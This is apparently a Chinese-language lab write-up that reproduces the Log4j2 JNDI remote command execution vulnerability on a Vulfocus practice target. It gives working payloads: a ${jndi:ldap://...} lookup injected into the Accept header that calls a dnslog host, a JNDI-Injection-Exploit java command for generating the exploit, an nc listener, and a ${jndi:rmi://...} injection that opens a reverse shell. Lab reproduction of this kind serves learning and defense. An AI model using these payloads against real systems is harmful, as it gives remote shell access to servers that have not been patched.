Log4j2远程命令执行复现
一、漏洞环境
环境是http://vulfocus.fofa.so平台的
data:image/s3,"s3://crabby-images/14113/141138b0cb546e0b45bd1a22c57364934246f892" alt="image-20211212223000457"
二、漏洞验证
启动环境后访问
抓包,修改请求为post
data:image/s3,"s3://crabby-images/60fbb/60fbb77b37324b53d8ec025ebcc5c64f1ba411a4" alt="image-20211212223158292"
在数据中的Accept:头插入exp
${jndi:ldap://8hqrxz.dnslog.cn}
成功回显到dnslog平台
三、反弹shell
使用 JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar 生成payload
可以在这里下载:https://github.com/bkfish/Apache-Log4j-Learning/tree/main/tools
使用该网址加密反弹shell命令:https://www.jackson-t.ca/runtime-exec-payloads.html
data:image/s3,"s3://crabby-images/eb2b4/eb2b4650d3012de07d12e4d9e7d909ccca424500" alt="image-20211211174047188"
然后生成payload
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -A "服务器ip" -C "命令"
data:image/s3,"s3://crabby-images/2bf2d/2bf2ddef6af5c33f6ce78ff1d10ccffc09c0d0dd" alt="image-20211212224248945"
服务器开启监听7777端口nc -lvnp 7777
再在Accept:头插入${jndi:rmi://服务器ip:端口/xxx} xxx为生成的exp
fuzz一下即可,也可能是其他的exp
data:image/s3,"s3://crabby-images/d7e92/d7e921ac85ebd523977cb41c0d77d1d282e67fe0" alt="image-20211212223744897"
服务器端的ldap回显正常,此时已经反弹shell成功
data:image/s3,"s3://crabby-images/0aade/0aadebf51705df3395d5c76f6fe5dd0ea7edf436" alt="image-20211212223900776"
|